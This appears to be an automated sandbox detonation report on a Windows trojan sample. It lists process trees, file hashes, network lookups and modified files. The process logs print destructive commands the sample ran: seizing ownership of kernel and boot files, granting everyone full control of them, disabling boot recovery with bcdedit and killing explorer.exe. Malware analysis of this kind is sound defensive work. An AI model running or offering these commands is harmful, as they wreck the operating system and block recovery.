| File opened for modification | C:\Program Files\WindowsApps\MIBCE0~1.0_X\APPXMA~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MI20B0~1.SCA\Assets\GA68FE~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI05FA~1.0_X\Assets\Square44x44Logo.targetsize-40.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\OneNoteSectionWideTile.scale-200.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB28C~1.0_X\Assets\AppList.targetsize-64.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\LinkedInboxBadge.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI05FA~1.0_X\RUNTIM~1.WIN | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\CONTRA~1\AppList.targetsize-256_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\1851_2~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HxMailAppList.targetsize-60_altform-unplated.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HxMailWideTile.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\en-gb\LOCIMA~1\offsymt.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIEA2E~1.0_X\Assets\1X1TRA~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI46F3~1.0_X\Assets\CONTRA~1\PeopleAppList.targetsize-32.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\INA134~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID54F~1.0_X\Assets\PH49F9~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI83BA~1.0_X\Assets\InsiderHubAppList.targetsize-40_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB44A~1.0_X\Assets\CA459E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4E99~1.0_X\Assets\WINDOW~1\WI7555~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIA289~1.SCA\Assets\INSIDE~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0835~1.SCA\Assets\SMALLT~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID483~1.0_X\Assets\GetStartedSplash.scale-100.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB44A~1.0_X\Assets\CalculatorAppList.targetsize-20.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\office.odf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4DB5~1.0_X\Assets\SECOND~1\Car\LTR\CONTRA~1\LARGET~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MICROS~3.SCA\RESOUR~1.PRI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI2A8B~1.SCA\APPXSI~1.P7X | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\MANIFE~1\BUCB18~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIF781~1.SCA\Assets\Images\SkypeLogo.scale-100.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\CONTRA~1\STB4E4~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~3.0_X\APPXBL~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI67C7~1.0_X\Assets\ScreenSketchSquare44x44Logo.targetsize-30_altform-unplated_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\HXD106~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICB88~1.0_X\RESOUR~1.PRI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MICROS~2.SCA\APPXSI~1.P7X | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MI7D2A~1.SCA\Assets\TIMERW~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MI5136~1.SCA\Assets\VOB28E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI92C9~1.0_X\Assets\MI075A~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6F49~1.0_X\Assets\Images\Stickers\ST8AF0~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6F49~1.0_X\Assets\Logos\SQUARE~1\PAINTM~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB28C~1.0_X\Assets\AppList.targetsize-40.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HX5F45~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~4.0_X\Assets\AppPackageLargeTile.scale-400.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ONB175~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\OU4763~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\EMPTYS~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\EMDD8E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\ExchangeBadge.scale-100.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\HXOUTL~3.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4DB5~1.0_X\Assets\SECOND~1\DIRECT~1\Home\LTR\CONTRA~2\LARGET~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MIA477~1.SCA\Assets\CONTRA~1\AppPackageStoreLogo.scale-125_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIF4CE~1.SCA\Assets\MEDIUM~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6F49~1.0_X\Assets\Images\Stickers\THUMBN~1\STF8A7~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0E28~1.0_X\MICROS~1.MET\Autogen\JSBYTE~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\HX6673~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~1.SCA\Assets\AppTiles\CONTRA~2\WEATHE~3.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~2\AppList.targetsize-72_altform-unplated_contrast-white.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI8AAC~1.0_X\SY48E3~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4EF6~1.0_X\STORE~1.PUR\Controls\XBOX36~1.XAM | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIF104~1.0_X\Assets\AL0F6B~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIF104~1.0_X\Assets\ALA215~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICB88~1.0_X\Assets\AppTiles\CONTRA~2\AppIcon.targetsize-96_altform-unplated_contrast-white.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~1\AppList.scale-150_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ON8F1E~1.PNG | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4527.tmp\4528.tmp\4529.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\WindowsApps"
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\WindowsApps" /grant everyone:F
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 2.17.107.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\4527.tmp\4528.tmp\4529.bat
| MD5 | fdc1bd905021633dfd77610ba86f7663 |
| SHA1 | 101d7151ce4993d4f314ac2e837a9f9292846cb5 |
| SHA256 | 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8 |
| SHA512 | b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240220-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240508-en
Max time kernel
149s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
140s
Max time network
125s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 220 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 4280 wrote to memory of 536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
| PID 4280 wrote to memory of 536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4C0D.tmp\4C0E.tmp\4C0F.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| BE | 2.17.107.114:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\4C0D.tmp\4C0E.tmp\4C0F.bat
| MD5 | 4c46c91a5d1a43115e11db625f322414 |
| SHA1 | 53c015fe4cf56784db8eaf28048d4cfae09ffa86 |
| SHA256 | 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524 |
| SHA512 | a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda |
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 2988 wrote to memory of 1448 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1448 wrote to memory of 2028 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\337F.tmp\3380.tmp\3381.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\choice.exe
choice /c yn /n /m ""
Network
Files
C:\Users\Admin\AppData\Local\Temp\337F.tmp\3380.tmp\3381.bat
| MD5 | 7c9274396b81ebfe6570c3b6b962e91c |
| SHA1 | d1768cf3a09cc3d652ae71fde70fc76d5c472b90 |
| SHA256 | c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89 |
| SHA512 | a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240419-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
142s
Max time network
127s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\MI4E99~1.0_X\Assets\WINDOW~1\WindowsCameraAppList.targetsize-40.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HXD899~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\images\CONTRA~1\ONBE82~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~3.0_X\Assets\AppTiles\WEATHE~1\30x30\1.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI10D6~1.0_X\Assets\CONTRA~1\AppList.targetsize-96_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\EM5DE6~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\GenericMailBadge.scale-150.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DELETE~1\MI443F~1.SCA\Assets\WINDOW~1\WindowsCameraMedTile.contrast-black_scale-125.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID483~1.0_X\Assets\GECFE7~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI05FA~1.0_X\Assets\SPLASH~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI92C9~1.0_X\Assets\CONTRA~1\MI4B0D~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI10D6~1.0_X\Assets\MedTile.scale-100.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIB44A~1.0_X\Assets\CA3608~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MICROS~3.0_X\BUILDI~1.XML | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI0A11~1.0_X\en-us\jscripts\WEFGAL~1.JS | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIC1D9~1.SCA\Assets\CONTRA~2\SmallTile.scale-125_contrast-white.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\HXMAIL~3.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\SNOOZE~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI8AAC~1.0_X\images\STOREL~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI8AAC~1.0_X\SY2E3E~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI6132~1.0_X\Assets\CONTRA~2\WIDETI~2.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MIEACE~1.0_X\Assets\VO338C~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MID5E5~1.0_X\Assets\CONTRA~1\BadgeLogo.scale-150_contrast-black.png | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI4E99~1.0_X\Assets\WINDOW~1\WI7233~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HXBA51~1.PNG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HX46DD~1.PNG | C:\Windows\system32\cmd.exe | N/A |
